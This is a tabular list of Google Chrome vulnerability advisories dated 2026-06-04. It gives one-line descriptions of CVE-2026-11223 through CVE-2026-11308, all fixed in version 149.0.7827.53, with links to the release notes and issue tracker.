| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11223 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494800494 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11224 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502461760 |
| Google--Chrome | Inappropriate implementation in WebUI in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11225 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503346647 |
| Google--Chrome | Insufficient policy enforcement in PreviewTab in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11226 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/385662278 |
| Google--Chrome | Incorrect security UI in Tab Hover Cards in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11227 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/448421954 |
| Google--Chrome | Inappropriate implementation in File Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11228 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/454484864 |
| Google--Chrome | Inappropriate implementation in Enterprise in Google Chrome prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via physical access to the device. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11229 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/482713603 |
| Google--Chrome | Use after free in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11230 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493225428 |
| Google--Chrome | Inappropriate implementation in Safe Browsing in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11231 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495840862 |
| Google--Chrome | Inappropriate implementation in TabGroups in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11232 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495981782 |
| Google--Chrome | Insufficient policy enforcement in FoldableAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11233 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496088449 |
| Google--Chrome | Inappropriate implementation in FoldableAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11234 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496095145 |
| Google--Chrome | Insufficient policy enforcement in Compositing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11235 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496419374 |
| Google--Chrome | Insufficient policy enforcement in Web Bluetooth in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11236 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496427030 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11237 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496617698 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11238 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496705691 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11239 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497025738 |
| Google--Chrome | Insufficient validation of untrusted input in Loader in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11240 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497030032 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11241 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497203741 |
| Google--Chrome | Insufficient validation of untrusted input in Plugins in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11242 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497385823 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11243 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497394061 |
| Google--Chrome | Insufficient validation of untrusted input in WebAuthentication in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11244 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497609145 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11245 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497610654 |
| Google--Chrome | Insufficient validation of untrusted input in IndexedDB in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11246 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497660733 |
| Google--Chrome | Insufficient policy enforcement in CustomTabs in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11247 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497865734 |
| Google--Chrome | Inappropriate implementation in Google Lens in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11248 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497946941 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11249 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497989379 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11250 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498281224 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11251 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498301853 |
| Google--Chrome | Insufficient policy enforcement in Content Settings in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11252 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498373018 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11253 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498397912 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11254 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498405554 |
| Google--Chrome | Insufficient validation of untrusted input in Storage Access API in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11255 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498417152 |
| Google--Chrome | Integer overflow in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11256 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498856565 |
| Google--Chrome | Inappropriate implementation in Browser in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11257 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499051898 |
| Google--Chrome | Inappropriate implementation in File System Access in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11258 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499078161 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11259 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499215943 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11260 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499257860 |
| Google--Chrome | Inappropriate implementation in PDF in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11261 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499262832 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11262 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499386363 |
| Google--Chrome | Insufficient policy enforcement in WebAuthentication in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11263 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500044225 |
| Google--Chrome | Policy bypass in Content Security Policy in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11264 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500099106 |
| Google--Chrome | Inappropriate implementation in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11265 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500262869 |
| Google--Chrome | Inappropriate implementation in SafeBrowsing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass Safe Browsing via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11266 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500521311 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass content security policy via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11267 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528267 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11268 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528706 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker in a privileged network position to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11269 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500551122 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11270 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501504245 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11271 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501685207 |
| Google--Chrome | Insufficient validation of untrusted input in Reading List in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11272 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501747321 |
| Google--Chrome | Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11273 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501757688 |
| Google--Chrome | Inappropriate implementation in DOM Distiller in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11274 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501760514 |
| Google--Chrome | Inappropriate implementation in Page Info in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11275 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501763121 |
| Google--Chrome | Inappropriate implementation in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to bypass discretionary access control via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11276 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501780338 |
| Google--Chrome | Insufficient policy enforcement in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11277 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501839664 |
| Google--Chrome | Inappropriate implementation in CustomTabs in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11278 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501859865 |
| Google--Chrome | Out of bounds read in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11279 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501878477 |
| Google--Chrome | Inappropriate implementation in Signin in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11280 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501892820 |
| Google--Chrome | Integer overflow in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted ETW event. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11281 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501900366 |
| Google--Chrome | Insufficient policy enforcement in Sandbox in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11282 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502023400 |
| Google--Chrome | Insufficient validation of untrusted input in Shortcuts in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11283 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502069297 |
| Google--Chrome | Side-channel information leakage in PerformanceAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11284 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502073069 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11285 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502090914 |
| Google--Chrome | Insufficient validation of untrusted input in Wallet in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11286 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502110170 |
| Google--Chrome | Insufficient policy enforcement in Navigation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11287 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502173136 |
| Google--Chrome | Insufficient policy enforcement in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11288 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502231588 |
| Google--Chrome | Side-channel information leakage in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11289 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502239897 |
| Google--Chrome | Integer overflow in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to cause a denial of service via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11290 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502264647 |
| Google--Chrome | Inappropriate implementation in Android Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11291 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502346855 |
| Google--Chrome | Insufficient policy enforcement in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11292 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502358901 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11293 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502362260 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11294 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502403953 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11295 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502444677 |
| Google--Chrome | Inappropriate implementation in ImageCapture in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11296 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502493950 |
| Google--Chrome | Insufficient validation of untrusted input in Reader Mode in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to bypass navigation restrictions via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11297 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502502017 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11298 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502503860 |
| Google--Chrome | Integer overflow in Fonts in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11299 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502598424 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11300 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503614310 |
| Google--Chrome | Inappropriate implementation in LiveCaption in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11301 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504180386 |
| Google--Chrome | Insufficient policy enforcement in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11302 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504196549 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11303 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504416752 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11304 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504418475 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11305 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504545544 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11306 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504548949 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11307 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504551617 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to perform privilege escalation via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11308 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505945112 |
